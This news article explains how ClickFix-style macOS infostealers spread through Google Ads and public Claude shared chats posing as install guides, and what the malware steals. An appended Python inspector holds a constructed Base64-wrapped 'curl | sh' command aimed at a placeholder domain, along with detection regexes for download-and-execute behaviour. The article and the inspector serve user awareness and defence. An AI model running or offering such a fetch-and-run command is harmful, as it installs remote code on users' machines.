Hackers spread macOS malware via ads

- Google Ads listings and public Claude.ai shared chats are being used right now to trick Mac users into pasting Terminal commands that install malware.
- BleepingComputer found two separate malicious Claude chats, while Microsoft says related ClickFix campaigns steal Keychain data, iCloud files, cookies, and wallet keys.
- The bigger shift is delivery, not payloads — attackers now use trusted ads and AI pages to bypass the warnings people expect.

Mac malware is getting distributed in a very 2026 way. Not through a sketchy torrent site or a fake Flash update, but through Google Ads and public Claude chat pages that look normal at a glance. The trick is simple — get someone searching for a real tool, land them on a page that feels official, and convince them to paste one command into Terminal. Once that happens, the usual Mac safety rails matter a lot less.

### What’s the scam here?

The current wave targets people looking for Anthropic tools on macOS, especially things like Claude desktop or Claude Code setup instructions. Sponsored search results can appear to point at Claude, but the click leads to a malicious page or a public Claude shared chat that pretends to be an installation guide. One example was framed as “Claude Code on Mac” and even attributed to “Apple Support,” which is exactly the kind of fake authority badge that gets people to stop thinking for ten seconds. (bleepingcomputer.com)

### Why use a Claude shared chat?

Because it borrows trust. A shared Claude page sits on a legitimate domain and looks like normal AI-generated help content, not a malware drop site. BleepingComputer found two separate public chats using the same social-engineering pattern but different infrastructure underneath, which suggests this is a repeatable delivery method, not a one-off prank. (bleepingcomputer.com)

### What does the victim actually do?

They paste a command into Terminal. That’s the whole hinge of the attack. The command is usually encoded, often with Base64, so it looks opaque and technical enough that many people won’t inspect it. But it turns out that command reaches out to attacker-controlled domains, pulls down a shell script, and runs the next stage. Microsoft says this tradecraft is spreading because scripts launched this way don’t go through the same Gatekeeper checks users would hit when opening a normal app bundle in Finder. (bleepingcomputer.com)

### What gets stolen?

Potentially a lot. Microsoft says recent macOS ClickFix-style campaigns are stealing media files, iCloud data, Keychain entries, and cryptocurrency wallet keys. Some variants also swap real wallet apps for trojanized ones. Earlier reporting tied fake Claude install pages to Amatera Stealer, aimed at credentials and crypto wallets, while Microsoft’s broader May 6 write-up names Macsync, Shub Stealer, and AMOS in related campaigns. Basically, the delivery pages vary, but the end goal is the same — drain anything valuable from the Mac. (bleepingcomputer.com)

### Why is this harder to catch?

Because the attacker is leaning on trusted surfaces instead of obviously malicious files. Google’s own ad policies ban malicious software, ad-network abuse, and misrepresentation, but bad ads still slip through review long enough to catch victims. On the payload side, BleepingComputer saw polymorphic delivery — a freshly obfuscated script on each request — which makes hash-based detection weaker. That’s like a thief changing jackets every time they walk past the camera. Same person, different snapshot. (microsoft.com)

### Why are Mac users especially exposed here?

Partly because the pitch matches real Mac behavior. Developers and power users already copy install commands from docs all the time, and plenty of regular users now do the same when AI tools tell them to. Push Security’s point in the earlier Claude Code campaign was blunt — the trust model often collapses to “does this page look like the right domain?” That’s a bad fit for ads, cloned docs, and shared AI pages. (support.google.com)

### So what should people actually do?

Don’t install Mac software from a sponsored result if you can avoid it. Navigate to the vendor site yourself. Don’t paste opaque Terminal commands from a shared chat, a blog post, or an “AI helper” page unless you can read what the command does. And if an installer flow suddenly asks for Terminal when you expected a drag-and-drop app, treat that as a fire alarm, not a minor inconvenience. (bleepingcomputer.com)

### Bottom line

The real change here is not that infostealers exist. It’s that the lure now lives inside places people already trust — ads, docs, and AI-generated help pages. That makes this less like classic malware spam and more like interface hijacking for everyday browsing. (bleepingcomputer.com)
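As an added illustration of the advice to read what a command does before pasting it (this is example code, not from the article or any vendor it cites): a small Python inspector that statically decodes an opaque Base64 one-liner of the kind described above, follows nested layers, and flags download-and-execute behaviour without ever running anything. The sample command, its `.invalid` domain, and the indicator list are constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample modeled on the ClickFix pattern in the article: an opaque
# Base64 blob piped into a shell. The hidden layer is a placeholder
# fetch-and-run one-liner; the .invalid domain never resolves.
DECODED_STAGE = "curl -fsSL https://updates.example.invalid/setup.sh | sh"
SAMPLE_COMMAND = (
    "echo " + base64.b64encode(DECODED_STAGE.encode()).decode() + " | base64 -d | bash"
)

# Defender-side heuristics (assumed, not an exhaustive list): name -> regex.
INDICATORS = [
    ("base64_decode", re.compile(r"base64\s+(-d|--decode|-D)\b")),
    ("download_to_shell", re.compile(r"\b(curl|wget)\b[^|;\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("eval_or_exec", re.compile(r"\b(eval|exec)\b")),
    ("remote_url", re.compile(r"https?://[^\s'\"]+")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _try_b64(token):
    """Return the decoded text of a Base64 token if it is readable text, else None."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def inspect_command(cmd, depth=0, max_depth=3):
    """Static inspection only: never executes cmd. Returns the indicator names
    that fired and every decoded layer, so the reader can see the real command."""
    findings = {name for name, rx in INDICATORS if rx.search(cmd)}
    layers = []
    if depth < max_depth:
        for token in B64_TOKEN.findall(cmd):
            decoded = _try_b64(token)
            if decoded is None:
                continue
            layers.append(decoded)
            inner = inspect_command(decoded, depth + 1, max_depth)
            findings |= inner["findings"]
            layers.extend(inner["decoded_layers"])
    return {"findings": findings, "decoded_layers": layers}


def verdict(cmd):
    """'download-and-execute' if any layer fetches and runs remote code,
    'suspicious' for any other indicator, otherwise 'no indicators'."""
    found = inspect_command(cmd)["findings"]
    if "download_to_shell" in found:
        return "download-and-execute"
    return "suspicious" if found else "no indicators"
```

Running `inspect_command(SAMPLE_COMMAND)` reveals the hidden `curl ... | sh` stage that the outer `echo ... | base64 -d | bash` wrapper hides from a casual glance.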
